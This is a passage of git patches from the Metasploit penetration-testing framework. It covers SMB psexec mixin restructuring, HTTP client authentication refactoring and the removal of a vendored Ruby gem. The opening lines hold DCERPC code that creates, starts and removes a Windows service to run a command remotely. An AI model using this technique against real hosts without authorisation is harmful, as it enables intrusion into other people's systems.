Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password - begin - vprint_status("#{peer} - Creating the service...") - response = dcerpc.call(0x0c, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - svc_handle = dcerpc.last_response.stub_data[0,20] - svc_status = dcerpc.last_response.stub_data[24,4] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception - end - - vprint_status("#{peer} - Opening service...") - begin - stubdata = - scm_handle + - NDR.wstring(servicename) + - NDR.long(0xF01FF) - - response = dcerpc.call(0x10, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - svc_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + - NDR.long(0) + - NDR.long(0) - begin - response = dcerpc.call(0x13, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle - begin - response = dcerpc.call(0x02, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end - - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end - - select(nil, nil, nil, 1.0) - simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") - return true - end - end From 4703278183733aae69839846bbdb20a2adaaa6f0 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 19 Feb 2013 12:55:06 -0600 Subject: [PATCH 15/87] Move SMB mixins into their own directory --- lib/msf/core/exploit/dcerpc.rb | 2 +- lib/msf/core/exploit/smb.rb | 18 ++------------- lib/msf/core/exploit/smb/authenticated.rb | 22 +++++++++++++++++++ lib/msf/core/exploit/{ => smb}/psexec.rb | 5 +++-- modules/auxiliary/admin/smb/psexec_command.rb | 4 +--- 5 files changed, 29 insertions(+), 22 deletions(-) create mode 100644 lib/msf/core/exploit/smb/authenticated.rb rename lib/msf/core/exploit/{ => smb}/psexec.rb (97%) diff --git a/lib/msf/core/exploit/dcerpc.rb b/lib/msf/core/exploit/dcerpc.rb index 51b11c738b..ff700984be 100644 --- a/lib/msf/core/exploit/dcerpc.rb +++ b/lib/msf/core/exploit/dcerpc.rb @@ -21,7 +21,7 @@ module Exploit::Remote::DCERPC DCERPCPacket = Rex::Proto::DCERPC::Packet DCERPCClient = Rex::Proto::DCERPC::Client DCERPCResponse = Rex::Proto::DCERPC::Response - DCERPCUUID = Rex::Proto::DCERPC::UUID + DCERPCUUID = Rex::Proto::DCERPC::UUID NDR = Rex::Encoder::NDR diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index f249af1ed2..6e24ea986e 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -4,7 +4,6 @@ require 'rex/proto/ntlm' require 'rex/proto/dcerpc' require 'rex/encoder/ndr' - module Msf ### @@ -18,7 +17,8 @@ module Msf module Exploit::Remote::SMB - require 'msf/core/exploit/psexec' + require 'msf/core/exploit/smb/authenticated' + require 'msf/core/exploit/smb/psexec' include Exploit::Remote::Tcp include Exploit::Remote::NTLM::Client @@ -35,20 +35,6 @@ module Exploit::Remote::SMB DCERPCUUID = Rex::Proto::DCERPC::UUID NDR = Rex::Encoder::NDR - # Mini-mixin for making SMBUser/SMBPass/SMBDomain regular options vs advanced - # Included when the module needs credentials to function - module Authenticated - def initialize(info = {}) - super - register_options( - [ - OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), - OptString.new('SMBPass', [ false, 'The password for the specified username', '']), - OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', 'WORKGROUP']), - ], Msf::Exploit::Remote::SMB::Authenticated) - end - end - def initialize(info = {}) super diff --git a/lib/msf/core/exploit/smb/authenticated.rb b/lib/msf/core/exploit/smb/authenticated.rb new file mode 100644 index 0000000000..62bfdd4703 --- /dev/null +++ b/lib/msf/core/exploit/smb/authenticated.rb @@ -0,0 +1,22 @@ +# -*- coding: binary -*- + +module Msf + +# Mini-mixin for making SMBUser/SMBPass/SMBDomain regular options vs advanced +# Included when the module needs credentials to function +module Exploit::Remote::SMB::Authenticated + + include Msf::Exploit::Remote::SMB + + def initialize(info = {}) + super + register_options( + [ + OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), + OptString.new('SMBPass', [ false, 'The password for the specified username', '']), + OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', 'WORKGROUP']), + ], Msf::Exploit::Remote::SMB::Authenticated) + end +end + +end diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb similarity index 97% rename from lib/msf/core/exploit/psexec.rb rename to lib/msf/core/exploit/smb/psexec.rb index 58e6788695..3ba505c6cf 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/smb/psexec.rb @@ -1,3 +1,4 @@ +# -*- coding: binary -*- require 'msf/core' require 'msf/core/exploit/dcerpc' @@ -11,10 +12,10 @@ module Msf # and runing a binary. #### -module Exploit::Remote::Psexec +module Exploit::Remote::SMB::Psexec include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::SMB::Authenticated # Retrives output from the executed command # diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 15e51b112e..54be82308f 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -5,9 +5,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB - include Msf::Exploit::Remote::SMB::Authenticated - include Msf::Exploit::Remote::Psexec + include Msf::Exploit::Remote::SMB::Psexec include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner From 0662677a72a2223eb295550cd6022e52436658f3 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 17:19:16 -0600 Subject: [PATCH 16/87] First minor cleanup sweep --- lib/rex/proto/http/client.rb | 80 +++++++++++++--------------- lib/rex/proto/http/client_request.rb | 2 +- 2 files changed, 38 insertions(+), 44 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 0244a9eb3e..13d36d91c0 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -169,27 +169,28 @@ class Client # # @return [Request] def request_raw(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - opts['cgi'] = false - opts['port'] = self.port + opts['agent'] ||= config['agent'] + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + + opts['cgi'] = false + opts['port'] = self.port + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' if opts['basic_auth'] and not opts['authorization'] opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(opts,self.config) + req = ClientRequest.new(self.config,opts) end @@ -205,24 +206,25 @@ class Client # # @return [Request] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} - opts['version'] = opts['version'] || config['version'] || '1.1' - opts['cgi'] = true - opts['port'] = self.port + opts['agent'] ||= config['agent'] + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + + opts['cgi'] = true + opts['port'] = self.port + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true @@ -234,7 +236,7 @@ class Client opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(opts,self.config) + req = ClientRequest.new(self.config,opts) end # @@ -396,7 +398,6 @@ class Client # We do persist the rest of the connection stream because Digest is a tcp session # based authentication method. # - def digest_auth(opts={}) @nonce_count = 0 @@ -753,13 +754,6 @@ class Client pipeline end - # - # Return the Authorization basic-auth header - # - def set_basic_auth_header(auth) - auth ? set_formatted_header("Authorization", "Basic " + Rex::Text.encode_base64(auth)) : "" - end - # # The client request configuration # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c24d9a8c4a..8af865bde1 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -34,7 +34,7 @@ class ClientRequest attr_reader :opts - def initialize(opts={}, client_config) + def initialize(client_config,opts={}) @cgi = opts['cgi'] @config = client_config @connection = opts['connection'] From a4905e43a2ebcabf8d8f3ef82f9964c09797a4c8 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 18:40:39 -0600 Subject: [PATCH 17/87] Fix the way creds are passed + YARD some ayrddocs on send_auth plus fix the wierd way i was passing creds around --- lib/rex/proto/http/client.rb | 36 +++++++++++++++++------------------- 1 file changed, 17 insertions(+), 19 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 13d36d91c0..66a4780618 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -319,6 +319,7 @@ class Client # # @param req [Request,#to_s] The request to send # @param t (see #connect) + # def send_request(req, t = -1) connect(t) conn.put(req.to_s) @@ -329,31 +330,29 @@ class Client !(self.username.nil?) && self.username != '' end - # - # Params - - # res = The 401 response we need to auth from - # opts = the opts used to generate the request that created this response - # t = the timeout for the http requests - # persist = whether to persist the tcp connection for HTTP Pipelining - # - # Parses the response for what Authentication methods are supported. - # Sets the corect authorization options and passes them on to the correct - # method for sending the next request. + # Resends an HTTP Request with the propper authentcation headers + # set. If we do not support the authentication type the server requires + # we return the original response object + # @param res [Response] the HTTP Response object + # @param opts [Hash] the options used to generate the original HTTP request + # @param t [Fixnum] the timeout for the request in seconds + # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) + # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) + opts['username'] ||= self.username + opts['password'] ||= self.password supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(self.username,self.password) + opts['headers']['Authorization'] = basic_auth_header(username,password) else - opts['headers'] = { 'Authorization' => basic_auth_header(self.username,self.password)} + opts['headers'] = { 'Authorization' => basic_auth_header(username,password)} end req = request_cgi(opts) res = _send_recv(req,t,persist) return res elsif supported_auths.include? "Digest" - opts['DigestAuthUser'] = self.username.to_s - opts['DigestAuthPassword'] = self.password.to_s temp_response = digest_auth(opts) if temp_response.kind_of? Rex::Proto::Http::Response res = temp_response @@ -403,8 +402,8 @@ class Client to = opts['timeout'] || 20 - digest_user = opts['DigestAuthUser'] || "" - digest_password = opts['DigestAuthPassword'] || "" + digest_user = opts['username'] || "" + digest_password = opts['password'] || "" method = opts['method'] path = opts['uri'] @@ -539,7 +538,6 @@ class Client # Builds a series of requests to complete Negotiate Auth. Works essentially # the same way as Digest auth. Same pipelining concerns exist. # - def negotiate_auth(opts={}) ntlm_options = { :signing => false, @@ -550,8 +548,8 @@ class Client } to = opts['timeout'] || 20 - opts['username'] ||= self.username.to_s - opts['password'] ||= self.password.to_s + opts['username'] ||= '' + opts['password'] ||= '' if opts['provider'] and opts['provider'].include? 'Negotiate' provider = "Negotiate " From de4234f0adfe877ede4d7d816f21ece5e6004cb8 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 18:48:03 -0600 Subject: [PATCH 18/87] Some more YARD docs --- lib/rex/proto/http/client.rb | 17 +++-------------- 1 file changed, 3 insertions(+), 14 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 66a4780618..132c7cdaf0 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -383,20 +383,9 @@ class Client auth_str = "Basic " + Rex::Text.encode_base64(auth_str) end - - # - # Opts - - # Inherits all the same options as send_request_cgi - # Also expects some specific opts - # DigestAuthUser - The username for DigestAuth - # DigestAuthPass - The password for DigestAuth - # DigestAuthIIS - IIS uses a slighlty different implementation, set this for IIS support - # - # This method builds new request to complete a Digest Authentication cycle. - # We do not persist the original connection , to clear state in preparation for our auth - # We do persist the rest of the connection stream because Digest is a tcp session - # based authentication method. - # + # Send a series of requests to complete Digest Authentication + # @param opts [Hash] the options used to build an HTTP request + # @return [Response] the last valid HTTP response we received def digest_auth(opts={}) @nonce_count = 0 From dac11474735f77b1b301a6ef5a6d01643f5ee30e Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 19:41:42 -0600 Subject: [PATCH 19/87] merge client config into opts --- lib/rex/proto/http/client.rb | 8 ++++++-- lib/rex/proto/http/client_request.rb | 4 ++-- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 132c7cdaf0..46bfffcc86 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -186,11 +186,13 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' + opts['client_config'] = self.config + if opts['basic_auth'] and not opts['authorization'] opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(self.config,opts) + req = ClientRequest.new(opts) end @@ -226,6 +228,8 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' + opts['client_config'] = self.config + if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true else @@ -236,7 +240,7 @@ class Client opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(self.config,opts) + req = ClientRequest.new(opts) end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 8af865bde1..9c87834499 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -34,9 +34,9 @@ class ClientRequest attr_reader :opts - def initialize(client_config,opts={}) + def initialize(opts={}) @cgi = opts['cgi'] - @config = client_config + @config = opts['client_config'] @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] From b2563dd6c27a06123be1c341003f1093175b7dc6 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 21:25:37 -0600 Subject: [PATCH 20/87] trying to clean up the mess from the revert --- lib/anemone/rex_http.rb | 4 +- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 -- .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 - .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 - .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 -- .../gems/method_source-0.7.1/README.markdown | 91 ------ .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 ----- .../method_source-0.7.1/lib/method_source.rb | 163 ----------- .../lib/method_source/source_location.rb | 138 --------- .../lib/method_source/version.rb | 3 - .../method_source-0.7.1/method_source.gemspec | 33 --- .../gems/method_source-0.7.1/test/test.rb | 122 -------- .../method_source-0.7.1/test/test_helper.rb | 50 ---- lib/msf/core/auxiliary/crawler.rb | 14 +- lib/msf/core/auxiliary/web/http.rb | 13 +- lib/msf/core/exploit/http/client.rb | 265 ++---------------- lib/rex/proto/http/client.rb | 28 +- 18 files changed, 65 insertions(+), 980 deletions(-) delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb diff --git a/lib/anemone/rex_http.rb b/lib/anemone/rex_http.rb index ce6a71a17f..f606f289fc 100644 --- a/lib/anemone/rex_http.rb +++ b/lib/anemone/rex_http.rb @@ -188,7 +188,9 @@ module Anemone context, url.scheme == "https", 'SSLv23', - @opts[:proxies] + @opts[:proxies], + @opts[:username], + @opts[:password] ) conn.set_config( diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest deleted file mode 100644 index e69de29bb2..0000000000 diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml deleted file mode 100644 index ba51bba6b2..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml +++ /dev/null @@ -1,17 +0,0 @@ -rvm: - - 1.8.7 - - 1.9.2 - - 1.9.3 - - ree - - rbx-18mode - - rbx-19mode - - jruby - -notifications: - irc: "irc.freenode.org#pry" - recipients: - - jrmair@gmail.com - -branches: - only: - - master diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts deleted file mode 100644 index a4e7838016..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts +++ /dev/null @@ -1 +0,0 @@ --m markdown diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile deleted file mode 100644 index e45e65f871..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile +++ /dev/null @@ -1,2 +0,0 @@ -source :rubygems -gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE deleted file mode 100644 index d1a50d62d0..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE +++ /dev/null @@ -1,25 +0,0 @@ -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown deleted file mode 100644 index d91b810a3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown +++ /dev/null @@ -1,91 +0,0 @@ -method_source -============= - -(C) John Mair (banisterfiend) 2011 - -_retrieve the sourcecode for a method_ - -*NOTE:* This simply utilizes `Method#source_location`; it - does not access the live AST. - -`method_source` is a utility to return a method's sourcecode as a -Ruby string. Also returns `Proc` and `Lambda` sourcecode. - -Method comments can also be extracted using the `comment` method. - -It is written in pure Ruby (no C). - -* Some Ruby 1.8 support now available. -* Support for MRI, RBX, JRuby, REE - -`method_source` provides the `source` and `comment` methods to the `Method` and -`UnboundMethod` and `Proc` classes. - -* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` -* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) -* See the [source code](http://github.com/banister/method_source) - -Example: display method source ------------------------------- - - Set.instance_method(:merge).source.display - # => - def merge(enum) - if enum.instance_of?(self.class) - @hash.update(enum.instance_variable_get(:@hash)) - else - do_with_enum(enum) { |o| add(o) } - end - - self - end - -Example: display method comments --------------------------------- - - Set.instance_method(:merge).comment.display - # => - # Merges the elements of the given enumerable object to the set and - # returns self. - -Limitations: ------------- - -* Occasional strange behaviour in Ruby 1.8 -* Cannot return source for C methods. -* Cannot return source for dynamically defined methods. - -Special Thanks --------------- - -[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. - -[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. - -[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. - -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile deleted file mode 100644 index 92c0234f3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile +++ /dev/null @@ -1,76 +0,0 @@ -dlext = Config::CONFIG['DLEXT'] -direc = File.dirname(__FILE__) - -require 'rake/clean' -require 'rake/gempackagetask' -require "#{direc}/lib/method_source/version" - -CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") -CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", - "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", - "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") - -def apply_spec_defaults(s) - s.name = "method_source" - s.summary = "retrieve the sourcecode for a method" - s.version = MethodSource::VERSION - s.date = Time.now.strftime '%Y-%m-%d' - s.author = "John Mair (banisterfiend)" - s.email = 'jrmair@gmail.com' - s.description = s.summary - s.require_path = 'lib' - - s.add_development_dependency("bacon","~>1.1.0") - s.add_development_dependency("rake", "~>0.9") - s.homepage = "http://banisterfiend.wordpress.com" - s.has_rdoc = 'yard' - s.files = `git ls-files`.split("\n") - s.test_files = `git ls-files -- test/*`.split("\n") -end - -task :test do - sh "bacon -q #{direc}/test/test.rb" -end - -desc "reinstall gem" -task :reinstall => :gems do - sh "gem uninstall method_source" rescue nil - sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" -end - -desc "Set up and run tests" -task :default => [:test] - -namespace :ruby do - spec = Gem::Specification.new do |s| - apply_spec_defaults(s) - s.platform = Gem::Platform::RUBY - end - - Rake::GemPackageTask.new(spec) do |pkg| - pkg.need_zip = false - pkg.need_tar = false - end - - desc "Generate gemspec file" - task :gemspec do - File.open("#{spec.name}.gemspec", "w") do |f| - f << spec.to_ruby - end - end -end - -desc "build all platform gems at once" -task :gems => [:rmgems, "ruby:gem"] - -desc "remove all platform gems" -task :rmgems => ["ruby:clobber_package"] - -desc "build and push latest gems" -task :pushgems => :gems do - chdir("#{direc}/pkg") do - Dir["*.gem"].each do |gemfile| - sh "gem push #{gemfile}" - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb deleted file mode 100644 index 9a3c325f75..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb +++ /dev/null @@ -1,163 +0,0 @@ -# (C) John Mair (banisterfiend) 2011 -# MIT License - -direc = File.dirname(__FILE__) - -require "#{direc}/method_source/version" -require "#{direc}/method_source/source_location" - -module MethodSource - # Determine if a string of code is a valid Ruby expression. - # @param [String] code The code to validate. - # @return [Boolean] Whether or not the code is a valid Ruby expression. - # @example - # valid_expression?("class Hello") #=> false - # valid_expression?("class Hello; end") #=> true - def self.valid_expression?(str) - if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ - Rubinius::Melbourne19.parse_string(str) - elsif defined?(Rubinius::Melbourne) - Rubinius::Melbourne.parse_string(str) - else - catch(:valid) { - eval("BEGIN{throw :valid}\n#{str}") - } - end - true - rescue SyntaxError - false - end - - # Helper method responsible for extracting method body. - # Defined here to avoid polluting `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [File] The opened source file - def self.source_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - (line - 1).times { file.readline } - - code = "" - loop do - val = file.readline - code << val - - return code if valid_expression?(code) - end - end - end - - # Helper method responsible for opening source file and buffering up - # the comments for a specified method. Defined here to avoid polluting - # `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [String] The comments up to the point of the method. - def self.comment_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - buffer = "" - (line - 1).times do - line = file.readline - # Add any line that is a valid ruby comment, - # but clear as soon as we hit a non comment line. - if (line =~ /^\s*#/) || (line =~ /^\s*$/) - buffer << line.lstrip - else - buffer.replace("") - end - end - - buffer - end - end - - # This module is to be included by `Method` and `UnboundMethod` and - # provides the `#source` functionality - module MethodExtensions - - # We use the included hook to patch Method#source on rubinius. - # We need to use the included hook as Rubinius defines a `source` - # on Method so including a module will have no effect (as it's - # higher up the MRO). - # @param [Class] klass The class that includes the module. - def self.included(klass) - if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && - RUBY_ENGINE =~ /rbx/ - - klass.class_eval do - orig_source = instance_method(:source) - - define_method(:source) do - begin - super - rescue - orig_source.bind(self).call - end - end - - end - end - end - - # Return the sourcecode for the method as a string - # (This functionality is only supported in Ruby 